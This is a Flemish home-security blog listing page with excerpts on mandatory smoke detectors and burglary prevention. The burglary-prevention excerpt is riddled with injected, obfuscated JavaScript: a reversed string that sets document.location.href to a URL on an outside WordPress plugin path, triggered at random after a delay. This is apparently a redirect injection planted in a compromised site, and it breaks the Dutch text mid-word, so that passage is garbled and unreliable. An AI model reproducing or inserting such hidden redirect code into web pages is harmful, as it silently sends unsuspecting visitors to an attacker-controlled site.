Blog

Vanaf januari 2021 strengere sancties bij het ontbreken van een rookmelder in je woning

Als je geen rookmelder(s) in je woning hebt, riskeer je vanaf 2021 dat je woning ongeschikt verklaard kan worden. Vanaf 1 januari zullen de consequenties ernstiger worden. De afwezigheid van een rookmelder wordt dan een overtreding van categorie II. Dit betekent dat er dan een ongeschiktheidsverklaring kan volgen bij het ontbreken van een rookmelder. Vooral …

Vanaf januari 2021 strengere sancties bij het ontbreken van een rookmelder in je woning Read More »

Inbraakpreventie: houd inbrekers buiten

Elke persoon wordt ooit in zijn of haar leven slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer van een inbraak. De meesten gaan pas over toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot actie nadat ze effectief slachtoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toffer zijn geworden van een inbraak en dus al aanzienlijke verliezen geleden hebben. Ontdek of jij nood hebt aan een alarmsysteem of bekijk onze checklist en ondervind welke tips jij nog kan toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toepassen!

varel-rookmelder-blog

Rookmelders verplicht vanaf januari 2020

Rookmelders zijn al een tijdje verplicht voor nieuwbouwwoningen. Nu heeft de Vlaamse regering de regelgeving rond rookmelders nog verstrengd. Vanaf januari 2020 zijn rookmelders ook verplicht in elke Vlaamse (huur)woning en studentenkamers. Waarom? Om de kans op woningbranden te verkleinen en te zorgen dat iedereen zich veilig voelt in huis. Hoog tijd om het nut van een rookmelder, brandbeveiliging en zelfs inbraakinstallaties te verduidelijken.